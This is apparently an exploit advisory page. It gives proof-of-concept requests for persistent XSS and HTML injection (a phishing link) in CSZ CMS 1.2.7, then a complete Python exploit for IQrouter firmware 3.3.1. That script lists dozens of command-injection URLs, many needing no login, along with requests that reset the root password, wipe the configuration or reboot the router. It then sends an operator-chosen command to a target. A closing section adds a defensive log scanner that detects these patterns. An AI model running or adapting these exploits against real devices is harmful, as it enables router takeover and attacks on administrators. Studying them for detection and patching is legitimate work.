All information, code and binary data in this advisory is released to the public under the [GNU General Public License, version 3 (GPLv3)](https://www.gnu.org/licenses/gpl-3.0.en.html).
For information, code or binary data obtained from other sources that has a license which is incompatible with GPLv3, the original license prevails.

CSZ CMS 1.2.7 Cross Site Scripting


CSZ CMS version 1.2.7 suffers from a persistent cross site scripting vulnerability.


MD5 | e25510fb8e80d1f7ec93c52dfd3126ac

# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# An unauthorized user that has access to private messages can embed JavaScript
# code into the admin panel.

# Steps to reproduce:
1- Log in to the member panel.
2- Change the User-Agent header to <script>alert(1)</script>
3- Send a private message to the admin user.
4- When the admin user logs in to the Backend System Dashboard, an alert box pops up on screen.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send

CSZ CMS 1.2.7 HTML Injection


CSZ CMS version 1.2.7 suffers from an html injection vulnerability.


MD5 | e290bb3d3ad91ab322e30869720d9789

# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# An authenticated user can inject a hyperlink into the Backend System Dashboard and
# the Member Dashboard via a message.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please click to view</a></b></h1>&message=phishing&submit=Send

IQrouter 3.3.1 Remote Code Execution


IQrouter firmware version 3.3.1 suffers from a remote code execution vulnerability.


MD5 | fc1a4eea527ae74190c43ec6d9d9985f

# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A

#!/usr/bin/env python3
import argparse
from sys import exit

try:
    import requests
except ImportError:
    print("Install requests lib! pip3 install requests")
    exit(1)  # nothing below works without requests


print("""
#######################################################################
#          IQrouter multiple RCE and other vulnerabilities           #
#                   by drakylar (Shaposhnikov Ilya)                   #
#            CVE-2020-11963 CVE-2020-11964 CVE-2020-11966             #
#                    CVE-2020-11967 CVE-2020-11968                    #
#######################################################################
""")


# Each payload is [URL template, description]; "{}" is replaced by the command.
# These only work while the router is still in setup mode.
rce_setup = [
    [
        "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
        "RCE /vlanTag (vlan_tag param)"
    ],
    [
        "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
        "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
        "RCE /screen9 (s2 param)"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
        "RCE /screen9 (s1 param)"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
        "RCE /screen9 (p2 param)"
    ],
    [
        "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
        "RCE /screen9 (p1 param)"
    ],
    [
        "/cgi-bin/luci/er/screen4?save_isp='`{}`",
        "RCE /screen4 (save_isp param)"
    ],
    [
        "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
        "RCE /screen2 (set_wan_modem_interfaces param)"
    ],
    [
        "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
        "RCE /screen2 (find_ip_address_conflict param)"
    ],
    [
        "/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
        "RCE /screen10 (set_security_question param)"
    ],
    [
        "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
        "RCE /screen10 (set_security_answer param)"
    ],
    [
        "/cgi-bin/luci/er/screen1?zonename='`{}`'",
        "RCE /screen1 (zonename param)"
    ],
    [
        "/cgi-bin/luci/er/register?email=`{}`",
        "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
    ]
]

# These work regardless of setup mode and without authentication.
rce_any = [
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
        "RCE /wifi (s2 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
        "RCE /wifi (s1 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
        "RCE /wifi (p2 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
        "RCE /wifi (p1 param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
        "RCE /wifi (guestwifi_5g_ssid param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
        "RCE /wifi (guestwifi_2g_ssid param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
        "RCE /wifi (guest_key param)"
    ],
    [
        "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
        "RCE /wifi (enable_guestwifi param)"
    ],
    [
        "/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123",
        "RCE /screen11.1 (email param)"
    ],
    [
        "/cgi-bin/luci/er/reboot_link?link='`{}`'",
        "RCE /reboot_link (link param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
        "RCE /diag_wifi (htm5ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
        "RCE /diag_wifi (htm2ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
        "RCE /diag_wifi (c5ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
        "RCE /diag_wifi (c2ghz param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
        "RCE /diag_set_static_wan (static_ip param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
        "RCE /diag_set_static_wan (net_mask param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
        "RCE /diag_set_static_wan (gateway param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
        "RCE /diag_set_static_wan (dns param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
        "RCE /diag_set_static_modem (static_ip param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
        "RCE /diag_set_static_modem (net_mask param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
        "RCE /diag_set_static_modem (gateway param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
        "RCE /diag_set_device_name_and_sync (device_name param)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
        "RCE /diag_set_device_name (device_name param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
        "RCE /diag_pppoe_update (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
        "RCE /diag_pppoe_update (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
        "RCE /diag_pppoe (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
        "RCE /diag_pppoe (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
        "RCE /diag_pppoa_update (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
        "RCE /diag_pppoa_update (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
        "RCE /diag_pppoa (wan_username param)"
    ],
    [
        "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
        "RCE /diag_pppoa (wan_password param)"
    ],
    [
        "/cgi-bin/luci/er/advanced_link?link='`{}`'",
        "RCE /advanced_link (link param)"
    ]
]

# State-changing requests that take no command; "{}" is not used here.
advanced_payloads = [
    [
        "/cgi-bin/luci/er/reboot_link?reboot=1",
        "Reboot IQrouter (/reboot_link reboot param)"
    ],
    [
        "/cgi-bin/luci/er/screen2?reboot=1",
        "Reboot IQrouter (/screen2 reboot param)"
    ],
    [
        "/cgi-bin/luci/er/index?reset_config=1",
        "Reset IQrouter (/index reset_config param)"
    ],
    [
        "/cgi-bin/luci/er/screen7?upgrade=1",
        "Upgrade IQrouter (/screen7 upgrade param)"
    ],
    [
        "/cgi-bin/luci/er/vlanTag?restart_network=1",
        "Restart network (/vlanTag restart_network param)"
    ],
    [
        "/cgi-bin/luci/er/diag_iperf_cmd/start",
        "Start iperf script (/diag_iperf_cmd/start)"
    ],
    [
        "/cgi-bin/luci/er/diag_iperf_cmd/stop",
        "Stop iperf script (/diag_iperf_cmd/stop)"
    ],
    [
        "/cgi-bin/luci/er/get_syslog",
        "Router setup info log (/get_syslog)"
    ],
    [
        "/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
        "Change root password to c00lpasswd (can change in code)"
    ],
    [
        "/cgi-bin/luci/er/reset_password/",
        "Change root password to 'changeme' (static)"
    ]
]


def print_payloads():
    """List every payload with the number to pass as -n/--num."""
    print('#' * 30)
    print("Payloads list")
    num = 1
    print('######################### RCE without auth ########################')
    for payload in rce_any:
        print("{} - {}".format(num, payload[1]))
        num += 1

    print(
        '############### RCE (router need to be in setup mode) ###############')
    for payload in rce_setup:
        print("{} - {}".format(num, payload[1]))
        num += 1

    print(
        '######################### Advanced payloads #########################')
    for payload in advanced_payloads:
        print("{} - {}".format(num, payload[1]))
        num += 1


parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str, required=True)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
                    default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
                    default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
                    default="http", type=str)

args = parser.parse_args()


def main():
    print("")
    # Same order as print_payloads(), so the number printed there is the
    # one that selects the payload here.
    full_payload_list = rce_any + rce_setup + advanced_payloads
    payloads_amount = len(full_payload_list)
    try:
        hostname = args.host
        port = args.port
        payload_num = int(args.num)
        bash_cmd = args.cmd
        protocol = args.protocol

        if payload_num < 1 or payload_num > payloads_amount:
            print("Error with payload number!")
            raise IndexError
        if port < 0 or port > 65535:
            print("Error with port number")
            raise IndexError
        if protocol not in ['http', 'https']:
            print("Error with protocol name")
            raise IndexError

        current_payload = full_payload_list[payload_num - 1]
        print("Payload: {}".format(current_payload[1]))
        print("Host: {}".format(hostname))
        print("Port: {}".format(port))
        print("Protocol: {}".format(protocol))
        print("Command: {}".format(bash_cmd))

        # Substitute the command into the URL template and build the full URL.
        full_url = "{}://{}:{}{}".format(protocol, hostname, port,
                                         current_payload[0].format(bash_cmd))
        print("Built URL: {}".format(full_url))

        r = requests.get(full_url)
        print("Status code: {}".format(r.status_code))
        return
    except IndexError:
        # Invalid arguments: show the usage text and the numbered payload list.
        parser.print_help()
        print_payloads()
        exit(1)


if __name__ == '__main__':
    print(
        "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
    exit(main())
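As an added defensive example, not part of drakylar's script or of the IQrouter firmware, the following Python reviews web server access log lines for the pattern every payload above shares: backtick or $() command substitution inside a */cgi-bin/luci/er/* query parameter or path segment, plus calls to the unauthenticated state-changing endpoints the advanced payloads use. The combined log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LUCI_PREFIX = "/cgi-bin/luci/er/"
# Backtick and $(...)/${...} substitution plus command separators: none of
# these belong in a VLAN tag, SSID, IP address or similar router setting.
SHELL_META = re.compile(r"`|\$\(|\$\{|;|\|")
# Endpoints / parameters that change router state without authentication.
SENSITIVE = {"reset_password", "diag_set_password", "reset_config", "reboot", "upgrade"}
# Common/combined access log format (assumed; matches the sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def analyze_request_target(target):
    """Return a list of findings for one request target, or None if it is not a luci/er URL."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if not path.startswith(LUCI_PREFIX):
        return None
    findings = []
    params = parse_qsl(parts.query, keep_blank_values=True)  # values are %-decoded
    for key, value in params:
        if SHELL_META.search(value):
            findings.append("shell metacharacters in query parameter %r" % key)
    segments = path[len(LUCI_PREFIX):].split("/")
    # The diag_* endpoints take their arguments as path segments, not a query string.
    if any(SHELL_META.search(seg) for seg in segments[1:]):
        findings.append("shell metacharacters in path segment of %r" % segments[0])
    if segments[0] in SENSITIVE or any(key in SENSITIVE for key, _ in params):
        findings.append("state-changing endpoint %r" % segments[0])
    return findings


def scan_access_log(lines):
    """Return one dict per suspicious request found in the given log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request_target(m["target"])
        if findings:
            hits.append({"ip": m["ip"], "target": m["target"], "findings": findings})
    return hits


# Constructed sample: three injection / state-change attempts and two benign requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Apr/2020:10:00:00 +0000] "GET /cgi-bin/luci/er/vlanTag?vlan_tag=%27%60id%60%27 HTTP/1.1" 200 512',
    '192.0.2.10 - - [21/Apr/2020:10:00:01 +0000] "GET /cgi-bin/luci/er/diag_set_static_wan/1/2/3/%27%60id%60%27/ HTTP/1.1" 200 87',
    '192.0.2.10 - - [21/Apr/2020:10:00:02 +0000] "GET /cgi-bin/luci/er/reset_password/ HTTP/1.1" 200 40',
    '198.51.100.7 - - [21/Apr/2020:10:00:03 +0000] "GET /cgi-bin/luci/er/screen2?set_wan_modem_interfaces=eth0.2 HTTP/1.1" 200 300',
    '198.51.100.7 - - [21/Apr/2020:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"], "; ".join(hit["findings"]))
```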
